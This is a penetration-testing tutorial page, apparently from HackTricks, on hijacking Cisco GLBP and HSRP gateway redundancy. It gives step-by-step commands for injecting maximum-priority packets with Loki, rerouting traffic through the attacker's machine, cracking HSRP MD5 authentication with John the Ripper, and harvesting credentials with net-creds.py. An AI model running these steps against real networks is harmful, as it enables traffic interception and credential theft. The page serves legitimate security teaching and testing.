hacktricks/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
carlospolop 1fa9f77ec3 change
2023-04-05 14:02:54 +02:00

19 KiB
Raw Blame History

GLBP & HSRP Attacks

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

This pages was copied from https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9****

FHRP Hijacking

What is FHRP?

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP, which I will demonstrate next.

GLBP Protocol

Developed by Cisco Systems engineers. Like HSRP, this protocol is implemented on top of TCP/IP protocol stack, thats why UDP transport layer protocol under port number 3222 is used for translation of service information. GLBP routers within the same logical group exchange special “hello” packets every 3 seconds, but if within 10 seconds a GLBP router within the same group has not received a hello packet from its GLBP neighbor, it recognizes it as “dead”. However, the timer values can be configured depending on the administrators needs.

The skeleton and mechanics of GLBP

GLBP provides load sharing to multiple routers (gateways) using one virtual IP address and multiple virtual MAC addresses. Each host is configured with the same virtual IP address and all routers in the virtual group participate in packet transmission.

Works much differently with the HSRP and VRRP protocols because it uses true load balancing mechanisms, I will denote below:

Host-Dependent. A type of load balancing used on a network where there is NAT. Host-Dependent guarantees the fact that the host will get back the same MAC address of the AVF device which was used at an earlier point in time, thus the NAT configured to the host will not be broken.

Round-Robin. In this mode, the AVG device distributes MAC addresses to AVF members alternately. This is the mechanism used by default.

Weight-based round-robin. Load balancing based on a special “Weight” metric

Roles in the GLBP domain & Terminology

AVG (Active Virtual Gateway) — the router with the leading role is also responsible for distributing MAC addresses to other routers within the same GLBP group. A kind of “boss” in the GLBP domain. AVG tells the other routers how to distribute traffic by handing out MAC addresses when an ARP request arrives. It is worth noting that there can only be one AVG router in a GLBP domain, but it can also be an AVF member.

AVF (Active Virtual Forwarder) — a router in a GLBP group handling traffic in the network.

GLBP Priority — The priority value that determines which router in the GLBP group will be the AVG. The default value is 100 (the priority range can be from 1 to 255). It can be set manually, i.e. the network engineer himself determines which router will be the “superior” and which will be the “slave”. The higher the priority, the more likely the router will get the AVG role. Usually the AVG role is given to more powerful routers.

GLBP Weight — The value of the so-called GLBP Weight of a router in a GLBP group. GLBP Weight defines the load level of the router. This value is “floating” and can vary depending on the load on the physical channel (the Object Tracking mechanism is involved), but it can also be configured manually.

GLBP Virtual IP Address — the virtual IP address in the GLBP domain. Used as the default gateway address for legitimate hosts.

GLBP uses the reserved group mailing IP address 224.0.0.102 and the UDP transport layer protocol port number 3222 to send and process service information. Special GLBP Hello packets are sent every 3 seconds. If the GLBP router has not received a hello packet from a neighbor within 10 seconds, the neighbor will be considered “dead” and will drop out of the GLBP domain.

GLBP Attack Mechanism

The technique of this network attack is to impose your device as the main router by injecting a malicious GLBP packet with a maximum priority value. Successful exploitation leads to a DoS or MITM attack in which you can intercept traffic within the network, conduct a redirect, or cause a DoS as you take over the role of AVG router. All you have to do is build a GLBP packet with the highest priority value of 255 and direct it towards the local network.

GLBP Injection (Loki)

To demonstrate this attack, I will use Loki. It will perform a malicious GLBP injection with a maximum priority value of 255 and a maximum weight value of 255. But before performing the attack, the following information needs to be examined:

  • The virtual IP address used in the GLBP domain
  • availability of authentication
  • Value of router priorities

We will be able to extract this information by analyzing GLBP traffic. We will use Wireshark.

As we see, only two routers are involved in the GLBP process: 10.10.100.100 and 10.10.100.200.

GLBP Ads

GLBP Advertisement from first router

After analyzing GLBP traffic we have the following:

  • A misconfiguration was detected within the priority setting. AVG router is considered a GLBP router with priority 200, i.e. we have a vector for GLBP hijacking
  • no authentication
  • The virtual IP address used in the GLBP domain is 10.10.100.254

With this information, we can easily attack GLBP.

Loki found GLBP ads from two routers

Before the attack, switch to promiscious mode and allow traffic routing:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router at IP address 10.10.100.100 and activate the Get IP option. You also need to generate a Gratuitous ARP.

The structure of a malicious GLBP injection

As you can see, the AVG router is now pretending to be an attacking system. The priority value is 255, the weight value is 255, i.e. the maximum.

After performing the injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the GLBP domain. You also need to set a 24-bit mask.

This way legitimate traffic will be looped back to us, because the virtual IP address used in the GLBP domain is the default gateway address for hosts:

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

To see not only incoming traffic but also outgoing traffic, we need a small rule for SNAT (masquerading):

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We also need to remove the default route on our machine and write a new one which will go through the former AVG router (address is 10.10.100.100). Even though we have hijacked the AVG role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Thats it, we are now the “man in the middle”! I will run the tool net-creds.py to analyze the traffic to look for important data. For example, unencrypted FTP traffic or NTLM hashes.

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will try to read the SMB share with the IP address 172.16.100.70, which is behind the GLBP routers.

user@Boundless:~$ smbclient -L \\172.16.100.70 --user mercy

This is how you can intercept traffic within the network by attacking GLBP domains.

HSRP Hijacking

HSRP (Hot Standby Router/Redundancy Protocol) — is a Cisco proprietary protocol that allows for network gateway redundancy. The general idea is to combine several physical routers into one logical router with a common IP address. This address of the virtual router will be assigned to the interface of the router with the master role, and the latter, in its turn, will take care of traffic forwarding. In the HSRP domain, the task of handling all traffic falls precisely on the router with the primary role, unlike GLBP, where load balancing by using special metrics (priority and weight) was proposed.

Roles in the HSRP domain & terminology

HSRP Active Router — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.
HSRP Standby Router — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.
HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
HSRP Virtual IP Address — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.

HSRP protocol versions

The HSRP protocol has two versions — HSRPv1 and HSRPv2. They differ in the following parameters:

  • The number of possible logical groups. HSRPv1 can have up to 255 groups. HSRPv2 can have up to 4096 groups
  • Multicast IP address. HSRPv1 uses IP address 224.0.0.2 to send service information, and HSRPv2 uses 224.0.0.102
  • Virtual MAC address. HSRPv1 uses 00:00:0C:07:AC:XX as its virtual MAC address. HSRPv2 has a virtual MAC address of 00:00:0C:9F:FX:XX (where XX is the HSRP group number)

HSRP uses the reserved IP address 224.0.0.2 or 224.0.0.102 (depending on the HSRP version) and the UDP transport layer protocol with port number 1985 to broadcast and process the service information. Special HSRP Hello packets are sent every 3 seconds. If the HSRP router does not receive a hello packet from a neighbor within 10 seconds, the neighbor will be considered “dead” and will drop out of the HSRP domain.

HSRP Attack Mechanism

This is exactly the same as GLBP Hijacking. We need to perform a malicious HSRP injection with a maximum priority value of 255. This allows us to hijack the role of the Active router, opening the door to a MITM attack. But again, we need to examine the following information before conducting the attack:

  • The virtual IP address used in the HSRP domain
  • The presence of authentication
  • Value of router priorities

We can extract this information by analyzing HSRP traffic. Lets use Wireshark.

As you can see in the screenshot, the HSRP process involves only two routers with addresses 10.10.100.100 and 10.10.100.200

HSRP Ads

First HSRP router

Second HSRP router

Based on the analysis of HSRP traffic, we have the following:

  • A misconfiguration was detected within the priority setting. Active router is considered to be a HSRP router with priority 200, that is, we have a vector for HSRP hijacking
  • the virtual IP address used in the HSRP domain is 10.10.100.254
  • MD5 authentication is used

Having authentication in the domain ties our hands, but I will fix that.

HSRP Authentication Bypassing

Save HSRP traffic dump in .pcap format, so that the exfiltrator can correctly extract MD5 hashes from the dump. I will use hsrp2john.py as the exfiltrator:

~/cisconightmare/exfiltrate$ python2 hsrp2john.py hsrp_with_authentication.pcap

Extracted MD5 hashes from HSRP traffic dump

I will crack the hashes with John the Ripper, specify the hashes themselves as input. And with the — wordlist switch I will specify the path to the dictionary:

~/cisconightmare/exfiltrate$ john hsrp_hashes --wordlist=wordlistforbrute

Cracked HSRP domain password

As a result, we have a key to enter the HSRP domain — endgame.

HSRP Injection (Loki)

I will use the same Loki to attack the HSRP protocol. Among other things, it has a key injection feature, which helps us bypass authentication. Earlier, in the HSRP Hijacking section, we obtained all the necessary information about the HSRP domain.

Starting Loki.

Loki detected HSRP ads

Dont forget to switch to promiscuous mode and allow traffic routing before conducting the attack:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router with an address of 10.10.100.100 and a priority of 200. As the Secret parameter, enter the cracked password from the HSRP domain, generate a Gratuitous ARP and select the Get IP option.

As we can see, the Active router is now our attacking system. The priority value is 255.

After injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the HSRP domain. You should also specify 24-bit mask. In this way, legitimate traffic will be looped back to us, because the virtual IP address used in the HSRP domain is the default gateway address for hosts.

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

We set up the well-known Source NAT (masquerading) to intercept all traffic:

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We remove the default route on our machine and write a new one which will go through the former Active router (its address is 10.10.100.100). Even though we have hijacked the active role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Now we are the “man in the middle”. Lets run net-creds.py:

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will reproduce an attempt to authenticate to the FTP server at 172.16.100.140:

~$ ftp 172.16.100.140

As a result, we get creeds from the FTP server: insomnia:betrayal

This is how you can attack the HSRP domain and intercept traffic. Basically, everything is similar to GLBP.

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥